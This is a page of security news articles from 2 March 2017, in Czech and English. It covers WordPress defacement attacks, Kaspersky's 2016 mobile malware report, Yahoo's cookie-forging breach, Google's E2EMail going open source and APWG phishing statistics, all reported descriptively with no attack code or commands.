2.3.2017 Novinky/Bezpečnost Zranitelnosti
Provozovatel populárního redakčního systému sice obratem vydal opravu, ne všichni jeho uživatelé ale mají nastaveny automatické aktualizace.
Více než milión internetových stránek, které využívají publikační systém WordPress, se stalo terčem hackerských útoků poté, co se začátkem února v tomto systému objevila kritická chyba.
Provozovatel platformy sice obratem vydal novou verzi 4.7.2, mnoho uživatelů však nemá zapnuty automatické aktualizace systému a bez ručního schválení bezpečnostní záplaty jsou jejich weby nadále zranitelné a snadno napadnutelné.
„Dva dny po vydání opravy jsme si všimli výrazného nárůstu útoků,“ řekl serveru Infosecurity-magazine.com Mark Maunderovi, ředitel společnosti WordFence, dodavatele stejnojmenného bezpečnostního pluginu pro WordPress. „Útoky pokračovaly a 6. února jsme zaznamenali novou variantu útoku, která obcházela naše bezpečnostní řešení a využívala chyb ve firewallu jiných dodavatelů,“ dodal.
Hackeři mezi sebou soutěžili, kolik webů „položí“
Kritická chyba aktivovala neobvyklé množství hackerů, kteří mezi sebou začali soutěžit, kolik internetových stránek fungujících na WordPressu poškodí. „Za pouhých 48 hodin jsme zaznamenali přes 800 tisíc útoků využívajících této konkrétní zranitelnosti WordPressu,“ uvedl šéf společnosti WordFence.
Někteří hackeři dokonce napadali již poškozené stránky a měnili je ke svému obrazu, aby zvýšili počet úspěšných zásahů. WordFence zaznamenal případ jediného hackera s přezdívkou MuhmadEmad, který úspěšně zaútočil na 350 tisíc webů využívajících WordPress.
„Jde o jednu z nejhorších zranitelností WordPressu v historii,“ konstatuje šéf WordFence. „Intenzivně pracujeme na tom, abychom pomohli uživatelům této platformy, ale pokud si neaktualizují WordPress na poslední verzi a nevyužívají dostatečně silný firewall, nedokážeme je ochránit,“ dodal.
WordPress je mezi hackery všeobecně oblíbený, protože má velmi široké uplatnění. Ze všech používaných systémů pro správu obsahu na internetu má největší podíl na trhu, celosvětově na něm funguje šest z deseti webů.
WordPress je oblíbeným cílem útoků
Ruku v ruce s oblíbeností této publikační platformy ale roste i zájem hackerů. Podle loňského průzkumu společnosti Sucuri, který se zaměřil na infikované stránky na internetu, byly tři čtvrtiny z více než 11 tisíc analyzovaných webů napadeny díky chybě ve WordPressu.
„Základním bezpečnostním pravidlem při používání publikačních systémů a systémů pro správu obsahu je jejich pravidelná a pokud možno bezodkladná aktualizace. Rozhodně se vyplatí mít zapnutou automatickou aktualizaci,“ říká Miroslav Dvořák, technický ředitel společnosti ESET.
Uživatelé by podle Dvořáka měli používat i kvalitní a prověřená bezpečnostní řešení, která je ochrání před škodlivými kódy. „Spoléhat na to, že jednou za čas ručně zaktualizujete systém, protože vám v něm už delší dobu svítí červené upozornění, že používáte zastaralé verze, je opravdu krátkozraké,“ dodává Dvořák.
Mobilní malware raketově roste, nejvíc je reklamních trojanů
2.3.2017 Root.cz Viry
Kaspersky Lab vydal podrobnou zprávu o stavu malware na mobilních telefonech. Z ní plyne, že útoků rapidně přibývá. Za rok proběhne tolik útoků, co dřív za pět let. Společnost Kaspersky Lab zveřejnila zprávu týkající se malware pro mobilní platformy. Z ní plyne, že v roce 2016 došlo k téměř trojnásobnému nárůstu detekcí mobilního malware proti roku předchozímu. Celkově došlo k 8,5 milionům škodlivých instalací, které byly identifikovány. Toto množství odhaleného malwaru za pouhý jeden rok odpovídá 50 % množství malwaru odhaleného mezi lety 2004 a 2015 – tedy za 11 let.
Nejvíce jsou zastoupeny reklamní trojské koně. Z 20 takovýchto programů je 16 trojanů, přičemž v roce 2015 jich bylo pouze 12. Nárůst je dobře patrný ze statistik, které Kaspersky Lab z mobilních zařízení získává:
Téměř 40 milionů útoků mobilním malwarem, přičemž přes čtyři miliony uživatelů používající zařízení s Androidem bylo ochráněno (oproti 2,6 milionům v roce 2015)
Přes 260 000 detekcí instalačních balíčků mobilních ransomwarových trojských koní (8,5násobný meziroční nárůst)
Více než 153 000 unikátních uživatelů napadených mobilním ransomwarem (v porovnání s rokem 2015 se jedná o 1,6násobný nárůst)
Přes 128 000 detekovaných mobilních bankovních trojanů (skoro 1,6násobný nárůst oproti roku 2015)
Druhy hrozeb v letech 2015 a 2016
Reklamní trojan: byl váš přístroj už napaden?
Zákeřné je, že trojany po úspěšném spuštění získají rootovská oprávnění a získají tak plnou kontrolu nad zařízením. To jim umožní nejen agresivně zobrazovat reklamu na infikovaných zařízeních, ale jsou též schopni skrytě instalovat jiné aplikace. Útočníci se také snaží přímo vydělat peníze tím, že pomocí Google Play nakupují aplikace.
Díky ovládnutí zařízení může trojan upravovat oddíl s operačním systémem, takže je velmi složité jej ze zařízení odstranit. Někteří reklamní trojští koně jsou dokonce schopni napadnout zálohovací systém, čímž prakticky znemožní vyřešení problému uvedením zařízení do továrního nastavení.
Hlavním problémem jsou v tomto případě bezpečnostní chyby v Android, ale zpráva upozorňuje na to, že mnoho je jich opraveno, ale uživatelé svá zařízení neaktualizují. V mnoha případech byli trojští koně schopni zneužít již záplatované zranitelnosti, protože si uživatelé nestáhli nejnovější aktualizace.
Bohužel se tento druh škodlivého softwaru opakovaně objevil v obchodě Google Play. Například maskovaný jako průvodce pro hru Pokemon GO. V tomto konkrétním případě byla aplikace stažena více než půl milionem uživatelů, přičemž je detekována jako Trojan.AndroidOS.Ztorg.ad.
Trojan.AndroidOS.Ztorg.ad vypadá jako průvodce hrou Pokemon GO
Ransomware a bankovní trojany
Vydírání se dnes netýká jen serverů ve firmách, ale čím dál častěji také mobilních telefonů. Moderní ransomwary překryjí zprávou vyžadující zaplacení výkupného otevřená okna, čímž znemožní používání celého zařízení. Tento princip využil nejoblíbenější ransomwarový program v roce 2016 – Trojan-Ransom.AndroidOS.Fusob.
Tento trojan nejčastěji útočí v Německu, Spojených státech a Británii, přičemž se cíleně vyhýbá státům bývalého Sovětského svazu a některým sousedícím zemím. Po svém spuštění provede trojan kontrolu jazyka zařízení a objeví-li nějaké neshody, může svou operaci zastavit. Útočníci stojící za tímto trojanem většinou pro odblokování přístroje požadují výkupné ve výši 100 až 200 dolarů. Toto výkupné musí být zaplaceno pomocí kódů předplacených karet pro iTunes.
Výrazně přibývá také bankovních trojanů. Za rok 2016 bylo mobilními bankovními trojany napadeno přes 305 000 uživatelů ve 164 zemích, předešlý rok šlo o 56 000 uživatelů ve 137 zemích. Mezi tři státy s nejvyšším podílem napadených uživatelů mobilními bankovními trojany patří Rusko, Austrálie a Ukrajina.
Trojan.AndroidOS.Ztorg.ad převlečený za přehrávač videa
Mobilní bankovní trojští koně se v průběhu roku vyvíjeli, mnoho z nich dokázalo obejít nové bezpečnostní mechanismy operačního systému Android a mohli tak pokračovat v kradení uživatelských informací i z nejnovějších verzí tohoto systému. Vývojáři těchto trojanů zároveň opakovaně vylepšovali schopnosti svých výtvorů. Například malwarová rodina Marcher kromě překrytí obvyklých bankovních aplikací ještě navíc uživatele přesměrovala ze stránek finančních institucí na phishingové weby.
Bez aktualizací to nepůjde
Množství reklamních trojských koní zneužívajících uživatelská práva v roce 2016 neustále rostlo. Kyberzločinci využívají faktu, že většina zařízení nemá nejnovější aktualizace operačního systému (nebo jsou provedeny pozdě), čímž se stávají náchylnými vůči starým a osvědčeným hrozbám, říká Petr Kuboš z Kaspersky Lab.
Navíc jsme podle jeho slov svědky toho, že se mobilní prostředí pro kyberzločince stává přeplněným, a proto se začínají poohlížet po světě za hranicí chytrých telefonů. Pravděpodobně tak letos zažijeme velké útoky na zařízení IoT, které budou spuštěny z mobilních zařízení. Útoky na podobná zařízení už probíhají, připomeňme ovládnutí chytrých kamer, síťových tiskáren nebo routerů.
Mobile malware evolution 2016
2.3.2017 Kaspersky Mobil Android Virus
Download PDF version
The year in figures
In 2016, Kaspersky Lab detected the following:
8,526,221 malicious installation packages
128,886 mobile banking Trojans
261,214 mobile ransomware Trojans
Trends of the year
Growth in the popularity of malicious programs using super-user rights, primarily advertising Trojans.
Distribution of malware via Google Play and advertising services.
Emergence of new ways to bypass Android protection mechanisms.
Growth in the volume of mobile ransomware.
Active development of mobile banking Trojans.
Malicious programs using super-user rights
The year’s most prevalent trend was Trojans gaining super-user privileges. To get these privileges, they use a variety of vulnerabilities that are usually patched in the newer versions of Android. Unfortunately, most user devices do not receive the latest system updates, making them vulnerable.
Root privileges provide these Trojans with almost unlimited possibilities, allowing them to secretly install other advertising applications, as well as display ads on the infected device, often making it impossible to use the smartphone. In addition to aggressive advertising and the installation of third-party software, these Trojans can even buy apps on Google Play.
This malware simultaneously installs its modules in the system directory, which makes the treatment of the infected device very difficult. Some advertising Trojans are even able to infect the recovery image, making it impossible to solve the problem by restoring to factory settings.
In addition to the secret installation of advertising apps, these Trojans can also install malware. We have registered installations of the modular trojan Backdoor.AndroidOS.Triada, which modified the Zygote processes. This allowed it to remain in the system and alter text messages sent by other apps, making it possible to steal money from the owner of the infected device. With super-user rights the Trojan can do almost anything, including substitute the URL in the browser.
Representatives of this class of malicious software have been repeatedly found in the official Google Play app store, for example, masquerading as a guide for Pokemon GO. This particular app was downloaded over half a million times and was detected as Trojan.AndroidOS.Ztorg.ad.
Trojan.AndroidOS.Ztorg.ad imitating a guide for Pokemon GO
Cybercriminals continue their use of Google Play
In Google Play in October and November, we detected about 50 new applications infected by Trojan.AndroidOS.Ztorg.am, the new modification of Trojan.AndroidOS.Ztorg.ad. According to installation statistics, many of them were installed more than 100,000 times.
Trojan.AndroidOS.Ztorg.ad imitating a video player
Google Play was used to spread Trojans capable of stealing login credentials. One of them was Trojan-Spy.AndroidOS.Instealy.a which stole logins and passwords for Instagram accounts. Another was Trojan-PSW.AndroidOS.MyVk.a: it was repeatedly published in Google Play and targeted user data from the social networking site VKontakte.
Yet another example is Trojan-Ransom.AndroidOS.Pletor.d, distributed by cybercriminals under the guise of an app for cleaning operating systems. Usually, representatives of the Trojan-Ransom.AndroidOS.Pletor family encrypt files on the victim device, but the detected modification only blocked the gadget and demanded a ransom to unblock it.
Trojan-Ransom.AndroidOS.Pletor.d imitating a system cleaner
Bypassing Android’s protection mechanisms
Cybercriminals are constantly looking for ways to bypass Android’s new protection mechanisms. For instance, in early 2016, we found that some modifications of the Tiny SMS Trojan were able to use their own window to overlay a system message warning users about sending a text message to a premium rate number. As the owner of the smartphone cannot see the original text, they are unaware of what they are agreeing to, and send the message to the number specified by the attacker.
A similar method was used by Trojan-Banker.AndroidOS.Asacub to get administrator rights on the device. The Trojan hides the system request from the user, cheating the latter into granting it extra privileges. In addition, Asacub asks for the right to be the default SMS application, which allows it to steal messages even in newer versions of Android.
The authors of Trojan-Banker.AndroidOS.Gugi went even further. This malicious program is able to bypass two new Android 6 security mechanisms using only social engineering techniques. Without exploiting system vulnerabilities, Gugi bypasses the request for Android’s permission to display its window on top of other applications as well as the dynamic permission requirement for potentially dangerous actions.
Mobile ransomware
While the very first mobile encryptor Trojan really did encrypt user data on a device and demand money to decrypt them, current ransomware simply displays the ransom demand on top of other windows (including system windows), thus making it impossible to use the device.
The same principle was used by the most popular mobile ransom program in 2016 – Trojan-Ransom.AndroidOS.Fusob. Interestingly, this Trojan attacks users in Germany, the US and the UK, but avoids users from the CIS and some neighboring countries (once executed, it runs a check of the device language, after which it may stop working). The cybercriminals behind the Trojan usually demand between $100 and $200 to unblock a device. The ransom has to be paid using codes from pre-paid iTunes cards.
Yet another way to block devices is to use the Trojan-Ransom.AndroidOS.Congur family, which is popular in China. These Trojans change the PIN code for the gadget, or enable this safety function by setting their own PIN. To do this, the ransom program has to get administrator rights. The victim is told to contact the attackers via the QQ messenger to unblock the device.
Mobile banking Trojans continued to evolve through the year. Many of them gained tools to bypass the new Android security mechanisms and were able to continue stealing user information from the most recent versions of the OS. Also, the developers of mobile banking Trojans added more and more new features to their creations. For example, the Marcher family redirected users from financial to phishing sites over a period of several months.
In addition, many mobile banking Trojans include functionality for extorting money: upon receiving a command from a server, they can block the operation of a device with a ransom-demand window. We discovered that one modification of Trojan-Banker.AndroidOS.Faketoken could not only overlay the system interface but also encrypt user data.
It is also worth noting that the cybercriminals behind malicious programs for Android did not forget about one of the hottest topics of 2016 – IoT devices. In particular, we discovered the ‘attack-the-router’ Trojan Switcher which targets the Wi-Fi network an infected device is connected to. If the Trojan manages to guess the password to the router, it changes the DNS settings, implementing a DNS-hijacking attack.
A glance into the Dark Web. Contribution from INTERPOL’s Global Complex for Innovation.
The Dark Web provides a means for criminal actors to communicate and engage in commercial transactions, like buying and selling various products and services, including mobile malware kits. Vendors and buyers increasingly take advantage of the multiple security and business-oriented mechanisms put in place on Tor (The Onion Router) cryptomarkets, such as the use of cryptocurrencies, third-party administration services (escrow), multisignature transactions, encryption, reputation/feedback tracking and others. INTERPOL has looked into major Dark Web platforms and found that mobile malware is offered for sale as software packages (e.g. remote access trojans – RATs); individual solutions; sophisticated tools, like those developed by professional firms; or, on a smaller scale, as part of a ‘Bot as a Service’ model. Mobile malware is also a ‘subject of interest’ on vendor shops, forums and social media.
Marketplaces
A number of mobile malware products and services are offered for sale on Dark Web marketplaces. Mobile malware is often advertised as part of a package, which can include, for instance, remote access trojans (RATs), phishing pages, or ‘hacking’ software bundles which consist of forensic and password-breaking tools. Individual/one piece tools are also offered for sale. For example, DroidJack was offered by different vendors on four major marketplaces. This popular Android RAT is sold openly on the Clearnet for a high price, but on the Dark Web the price is much lower.
Both variants (package and individual) sometimes come with ‘how-to’ guides which explain the methods for hacking popular operating systems, such as Android and iOS. More sophisticated tools are also advertised on the Dark Web, such as Galileo, a remote control system developed by the Italian IT company Hacking Team in order to access remotely and then exploit devices that run Android, iOS, BlackBerry, Windows or OS X. Another example is the source code for Acecard. This malware is known for adding overlay screens on top of mobile banking applications and then forwarding the user’s login credentials to a remote attacker. It can also access SMS, from which potentially useful two-factor authentication codes can be obtained by fraudsters.
The Android bot rent service (BaaS, or Bot as a Service) is also available for purchase. The bot can be used to gather financial information from Android phones and comes with many features and documentation, available in both Russian and English. More features and specifications can be developed on request. This service can cost up to USD 2,500 per month or USD 650 per week.
Mobile phishing products for obtaining financial information, tools that can control phones through Bluetooth or change their IMEI (International Mobile Equipment Identity), and various Android RATs that focus on intercepting text messages, call logs and locations, and accessing the device’s camera, are also displayed on Dark Web marketplaces.
Vendor shops, forums and social media
Vendor shops are standalone platforms created by a single or group of vendors who have built up a customer base on a marketplace and then decided to start their own business. Generally, these shops do not have forums and merely advertise one specific type of illicit item, such as drugs or stolen personal information, but they also sell mobile malware (DroidJack). Tutorials are sometimes attached to mobile malware products, and information on which tools are fit for purpose and how to install and utilize them can also be found in forum threads and on social media. Furthermore, a Tor hidden service focused on hacking news was found to contain information on how to set up Dendroid mobile malware. This RAT, which is capable of intercepting SMS messages, downloading pictures and opening a dialogue box to phish passwords, dates from 2014 but was still offered in 2016 as part of several advertisements (packages) on different marketplaces.
Due to its robust anonymity, OPSEC techniques, low prices and client-oriented strategy, the Dark Web remains an attractive medium for conducting illicit businesses and activities, and one where specific crime areas may arise or grow in the future. The development of innovative technical solutions (in close cooperation with academia, research institutes and private industry), international cooperation and capacity building are fundamental pillars in the fight against the use of Dark Web by criminals.
Statistics
In 2016, the number of malicious installation packages grew considerably, amounting to 8,526,221 – three times more than the previous year. As a comparison, from 2004 to 2013 we detected over 10,000,000 malicious installation packages; in 2014 the figure was nearly 2.5 million.
From the beginning of January till the end of December 2016, Kaspersky Lab registered nearly 40 million attacks by malicious mobile software and protected 4,018,234 unique users of Android-based devices (vs 2.6 million in 2015).
The number of attacks blocked by Kaspersky Lab solutions, 2016
The number of users protected by Kaspersky Lab solutions, 2016
Geography of mobile threats
Attacks by malicious mobile software were recorded in more than 230 countries and territories.
The geography of mobile threats by number of attacked users, 2016
TOP 10 countries by the percentage of users attacked by mobile malware
Country* %**
1 Bangladesh 50.09%
2 Iran 46.87%
3 Nepal 43.21%
4 China 41.85%
5 Indonesia 40.36%
6 Algeria 36.62%
7 Nigeria 35.61%
8 Philippines 34.97%
9 India 34.18%
10 Uzbekistan 31.96%
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab’s mobile security products in the country.
China, which topped this rating in 2015, continued to lead the way in the first half of 2016 but dropped to fourth overall for the year, being replaced by Bangladesh, which led similar ratings throughout 2016. More than half of all users of Kaspersky Lab mobile security products in Bangladesh encountered mobile malware.
The most widespread mobile malware targeting users in Bangladesh in 2016 were representatives of advertising Trojans belonging to the Ztorg and Iop families, as well as advertising programs of the Sprovider family. This malware, as well as representatives of the AdWare.AndroidOS.Ewind and AdWare.AndroidOS.Sprovider families were most frequently found on user devices in all the countries in the Top 10, except China and Uzbekistan.
In China, a significant proportion of the attacks involved the Backdoor.AndroidOS.Fakengry.h and Backdoor.AndroidOS.GinMaster.a families as well as representatives of RiskTool.AndroidOS.
Most of the attacks on users in Uzbekistan were carried out by Trojan-SMS.AndroidOS.Podec.a and Trojan-FakeAV.AndroidOS.Mazig.b. Representatives of the advertising Trojans Iop and Ztorg, as well as the advertising programs of the Sprovider family were also quite popular in the country.
Types of mobile malware
Starting this year, we calculate the distribution of mobile software by type, based on the number of detected installation packages, rather than modifications.
Distribution of new mobile malware by type in 2015 and 2016
Over the reporting period, the number of new RiskTool files detected grew significantly – from 29% in 2015 to 43% in 2016. At the same time, the share of new AdWare files fell – 13% vs 21% in the previous year.
For the second year running, the percentage of detected SMS Trojan installation packages continued to decline – from 24% to 11%, which was the most notable fall. Despite this, we cannot say that the SMS Trojan threat is no longer relevant; in 2016, we detected nearly 700,000 new installation packages.
The most considerable growth was shown by Trojan-Ransom: the share of this type of malware among all installation packages detected in 2016 increased almost 6.5 times to 4%. This growth was caused by the active distribution of two families of mobile ransomware – Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Congur.
Top 20 malicious mobile programs
Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare (advertising programs).
Detection %*
1 DangerousObject.Multi.Generic 67.93%
2 Backdoor.AndroidOS.Ztorg.c 6.58%
3 Trojan-Banker.AndroidOS.Svpeng.q 5.42%
4 Trojan.AndroidOS.Iop.c 5.25%
5 Backdoor.AndroidOS.Ztorg.a 4.83%
6 Trojan.AndroidOS.Agent.gm 3.44%
7 Trojan.AndroidOS.Ztorg.t 3.21%
8 Trojan.AndroidOS.Hiddad.v 3.13%
9 Trojan.AndroidOS.Ztorg.a 3.11%
10 Trojan.AndroidOS.Boogr.gsh 2.51%
11 Trojan.AndroidOS.Muetan.b 2.40%
12 Trojan-Ransom.AndroidOS.Fusob.pac 2.38%
13 Trojan-Ransom.AndroidOS.Fusob.h 2.35%
14 Trojan.AndroidOS.Sivu.c 2.26%
15 Trojan.AndroidOS.Ztorg.ag 2.23%
16 Trojan.AndroidOS.Ztorg.aa 2.16%
17 Trojan.AndroidOS.Hiddad.an 2.12%
18 Trojan.AndroidOS.Ztorg.i 1.95%
19 Trojan-Dropper.AndroidOS.Agent.cv 1.85%
20 Trojan-Dropper.AndroidOS.Triada.d 1.78%
* Percentage of users attacked by the malware in question, relative to all users attacked.
First place in the Top 20 is occupied by DangerousObject.Multi.Generic (67.93%), used in malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program. This is basically how the very latest malware is detected.
In second place was Backdoor.AndroidOS.Ztorg.c, the advertising Trojan using super-user rights to secretly install various applications. Noticeably, the 2016 rating included 16 advertising Trojans (highlighted in blue in the table), which is four more than in 2015.
The most popular mobile banking Trojan in 2016 was Trojan-Banker.AndroidOS.Svpeng.q in third place. The Trojan became so widespread after being distributing via the AdSense advertising network. Due to a vulnerability in the Chrome browser, the user was not required to take any action to download the Trojan on the device. It should be noted that more than half of the users attacked by mobile banking Trojans in 2016 encountered representatives of the Svpeng family. They use phishing windows to steal credit card data and also attack SMS banking systems.
Representatives of the Fusob family – Trojan-Ransom.AndroidOS.Fusob.pac and Trojan-Ransom.AndroidOS.Fusob.h – claimed 12th and 13th respectively. These Trojans block a device by displaying their own window and demanding a ransom to remove it.
Mobile banking Trojans
In 2016, we detected 128,886 installation packages of mobile banking Trojans, which is 1.6 times more than in 2015.
Number of installation packages of mobile banking Trojans detected by Kaspersky Lab solutions in 2016
In 2016, 305,543 users in 164 countries were attacked by mobile banking Trojans vs 56,194 users in 137 countries the previous year.
Geography of mobile banking threats in 2016 (number of users attacked)
Top 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users
Country* %**
1 Russia 4.01
2 Australia 2.26
3 Ukraine 1.05
4 Uzbekistan 0.70
5 Tajikistan 0.65
6 The Republic of Korea 0.59
7 Kazakhstan 0.57
8 China 0.54
9 Belarus 0.47
10 Moldova 0.39
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile banking Trojans, relative to all users of Kaspersky Lab’s mobile security products in the country.
In Russia – ranked first in the Top 10 – mobile banking Trojans were encountered by 4% of mobile users. This is almost two times higher than in second-placed Australia. The difference is easily explained by the fact that the most popular mobile banking Trojan Svpeng was mostly spread in Russia. Representatives of the Asacub and Faketoken families were also popular there.
In Australia, the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were responsible for most infection attempts. In South Korea (7th place) the most popular banking Trojans belonged to the Trojan-Banker.AndroidOS.Wroba family.
In the other countries of the Top 10, the most actively distributed mobile banking Trojan families were Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Svpeng. The representatives of the latter were especially widespread in 2016, with more than half of mobile users encountering them. As we have already mentioned, this was the result of them being distributed via the AdSense advertising network and being loaded stealthily via a mobile browser vulnerability.
The Trojan-Banker.AndroidOS.Faketoken family was in second place in this rating. Some of its modifications were capable of attacking more than 2,000 financial organizations.
Third place was occupied by the Trojan-Banker.AndroidOS.Asacub family, which attacked more than 16% of all users affected by mobile bankers. These Trojans are mainly distributed in Russia, often via SMS spam.
Mobile Trojan-Ransom
In 2016, the volume of mobile ransomware increased considerably both in the number of installation packages detected and in the number of users attacked. Over the reporting period, we detected 261,214 installation packages, which is almost 8.5 times more than in 2015.
Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q1 2016 – Q4 2016)
In 2016, 153,258 unique users from 167 countries were attacked by Trojan-Ransom programs; this is 1.6 times more than in 2015.
Interestingly, a large number of installation packages in the first two quarters of 2016 belonged to the Trojan-Ransom.AndroidOS.Fusob family, though there was a fall in activity in the third quarter. The subsequent growth in the fourth quarter was fueled by an increase in activity by the Trojan-Ransom.AndroidOS.Congur family: it includes relatively simple Trojans that either block a device using their own window, or change the device’s password.
Geography of mobile ransomware threats in 2016 (number of users attacked)
TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.
Country* %**
1 Germany 2.54
2 USA 2.42
3 Canada 2.34
4 Switzerland 1.88
5 Kazakhstan 1.81
6 United Kingdom 1.75
7 Italy 1.63
8 Denmark 1.29
9 Mexico 1.18
10 Australia 1.13
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** Percentage of unique users attacked by mobile Trojan ransomware, relative to all users of Kaspersky Lab’s mobile security products in the country.
The largest percent of mobile users attacked by ransomware was in Germany – over 2.5%. In almost all the countries in this ranking, representatives of the Trojan-Ransom.AndroidOS.Fusob and Trojan-Ransom.AndroidOS.Svpeng families were particularly popular. Kazakhstan (5th place) was the only exception – the most frequently used ransom programs there were various modifications of the Trojan-Ransom.AndroidOS.Small family.
More information about these three families of mobile Trojan ransomware can be found in a dedicated study.
Conclusion
In 2016, the growth in the number of advertising Trojans capable of exploiting super-user rights continued. Throughout the year it was the No. 1 threat, and we see no sign of this trend changing. Cybercriminals are taking advantage of the fact that most devices do not receive OS updates (or receive them late), and are thus vulnerable to old, well-known and readily available exploits.
This year, we will continue to closely monitor the development of mobile banking Trojans: the developers of this class of malware are the first to use new technologies and are always looking for ways to bypass security mechanisms implemented in the latest versions of mobile operating systems.
In 2016, one of the most controversial issues was the safety of IoT devices. Various Internet-connected ‘smart’ devices are becoming increasingly popular, though their level of security is fairly low. Also in 2016, we discovered an ‘attack-the-router’ Trojan. We see that the mobile landscape is getting a little crowded for cybercriminals, and they are beginning to interact more with the world beyond smartphones. Perhaps in 2017 we will see major attacks on IoT components launched from mobile devices.
Yahoo Reveals 32 Million Accounts Were Hacked Using 'Cookie Forging Attack'
2.3.2017 thehackernews Incindent
Yahoo has just revealed that around 32 million user accounts were accessed by hackers in the last two years using a sophisticated cookie forging attack without any password.
These compromised accounts are in addition to the Yahoo accounts affected by the two massive data breaches that the company disclosed in last few months.
The former tech giant said that in a regulatory filing Wednesday that the cookie caper is likely linked to the "same state-sponsored actor" thought to be behind a separate, 2014 data breach that resulted in the theft of 500 Million user accounts.
"Based on the investigation, we believe an unauthorized third party accessed the company's proprietary code to learn how to forge certain cookies," Yahoo said in its annual report filed with the US Securities and Exchange Commission (SEC).
"The outside forensic experts have identified approximately 32 million user accounts for which they believe forged cookies were used or taken in 2015 and 2016. We believe that some of this activity is connected to the same state-sponsored actor believed to be responsible for the 2014 security incident."
"Forged cookies" are digital keys that allow access to accounts without re-entering passwords.
Instead of stealing passwords, hackers trick a web browser into telling Yahoo that the victim had already logged in by forging little web browser tokens called cookies.
Yahoo revealed the cookie caper in December last year, but the news was largely overlooked, as the statement from Yahoo provided information on a separate data breach that occurred in August 2013 involving more than 1 Billion Yahoo accounts.
In a statement, the company said the hackers might have stolen names, email addresses, hashed passwords, telephone numbers, dates of birth, and, in some cases, encrypted or unencrypted security questions and answers.
Yahoo began warning its customers just last month that some state-sponsored actors had accessed their Yahoo accounts by using the sophisticated cookie forging attack.
However, the good news is that the forged cookies have since been "invalidated" by Yahoo so they cannot be used to access user accounts.
Yahoo's CEO Marissa Mayer Loses Bonus
In the meantime when Yahoo revealed about the scope of the cookie caper, Yahoo CEO Marissa Mayer said she would forgo her annual bonus, which is US$2 Million, and any 2017 equity award, which is usually about $12 Million of stock, in response to the security incidents occurred during her tenure.
"When I learned in September 2016 that a large number of our user database files had been stolen, I worked with the team to disclose the incident to users, regulators, and government agencies," Mayer wrote in a note published Monday on Tumblr.
"However, I am the CEO of the company and since this incident happened during my tenure, I have agreed to forgo my annual bonus and my annual equity grant this year and have expressed my desire that my bonus be redistributed to our company’s hardworking employees, who contributed so much to Yahoo’s success in 2016."
Besides this, Yahoo's general counsel and secretary Ronald Bell also resigned as of Wednesday after the company revealed that "senior executives and relevant legal staff were aware that a state-sponsored actor had accessed certain user accounts by exploiting the Company’s account management tool."
The ongoing revelation of security incidents in the company has hit Yahoo's credibility badly. Just last month, Yahoo and Verizon Communications Inc. agreed to reduce the price of the upcoming acquisition deal by $350 Million in the wake of the two data breaches.
The deal, which was previously finalized at $4.8 Billion, now valued at about $4.48 Billion in cash and is expected to close in the second quarter.
The Google E2EMail is now fully community-driven open source project
2.3.2017 securityaffairs Krypto
Google has now announced that E2EMail is no more a Google product, instead, it has become a “fully community-driven open source project.”
The End-to-End crypto library is a core component of several projects of the IT giant such as the E2EMail, a Chrome app that runs independent of the normal Gmail web interface and allows non-technical users to exchange encrypted text mail over Gmail.
In the past, Google shared the E2EMail source code in order to receive the contributions from several security communities. Now Google has now announced that the same project is no more a Google product, instead, it has become a “fully community-driven open source project.”
The decision is probably motivated by the consideration that no one since now has developed a Chrome extension for E2EMail.
“E2EMail is not a Google product, it’s now a fully community-driven open source project, to which passionate security engineers from across the industry have already contributed.” reads the blog post published by Google.
“E2EMail offers one approach to integrating OpenPGP into Gmail via a Chrome Extension, with improved usability, and while carefully keeping all cleartext of the message body exclusively on the client. E2EMail is built on a proven, open source Javascript crypto library developed at Google.”
Google is looking forward to receive the support of the security community to integrate E2EMail with other projects.
“E2EMail in its current incarnation uses a bare-bones central keyserver for testing, but the recent Key Transparency announcement is crucial to its further evolution,” continues the post. “Key discovery and distribution lie at the heart of the usability challenges that OpenPGP implementations have faced. Key Transparency delivers a solid, scalable, and thus practical solution, replacing the problematic web-of-trust model traditionally used with PGP.”
Phishing Trends Report – 2016 ended as the worst year for phishing in history
2.3.2017 securityaffairs Phishing
The Anti-Phishing Working Group (APWG) published the Phishing Trends Report for Q4 2016. APWG reported 1.2 million phishing attacks in 2016.
The Anti-Phishing Working Group (APWG) published the Phishing Trends Report for Q4 2016. The data are worrisome, 2016 ended as the worst year for phishing in history. The experts reported the total number of phishing attacks in 2016 was 1,220,523, a 65 percent increase over 2015.
The analysis of data across the years could give us precious information about the evolution of phishing activities.
In little more than a decade, the number of phishing attacks per month observed in Q4 is passed from 1,609 in 2004, up to 92,564 phishing attacks per month in 2016 (+5,753 percent).
The most targeted industry sectors in the fourth quarter of 2016 are the Retail and Financial services.
The Phishing Trends Report for Q4 2016 includes data provided by the company Axur that is located in Brazil. Axur focused on monitoring phishing attacks on financial organizations, technology firms, airlines, and online marketplaces located in the country.
“Fraudsters in Brazil are using both traditional phishing and social media to defraud Internet users. They are also using technical tricks to make it harder for responders to stop theses scams. ” states the APWG.
According to the APWG, the overall number of brands targeted by phishers during the holiday season dropped in a significant way, likely because crooks concentrated on fewer targets.
The company RiskIQ that monitored thousands of phishing attack revealed that the top-10 TLDs where phishing attacks occurred in 4Q2016 were:
The report shows that very few phishers registered domain names that were confusingly similar to the legitimate brands. The crooks mostly used URL with brand names, or misspellings thereof, in subdomains.
“A relatively low percentage of phishing websites targeting a brand attempt to spoof that brand in the domain name—whether at the second-level or in the fully-qualified domain name,” says Jonathan Matkowsky, VP for intellectual property & brand security at RiskIQ. This is evidence that phishers do not need to use deceptive domains names to fool Internet users into visiting their sites. Instead, users are often fooled by hyperlinks (which must be hovered over to even see the destination domain), URL shorteners, which mask the destination domain, or brand names inserted elsewhere in the URL.
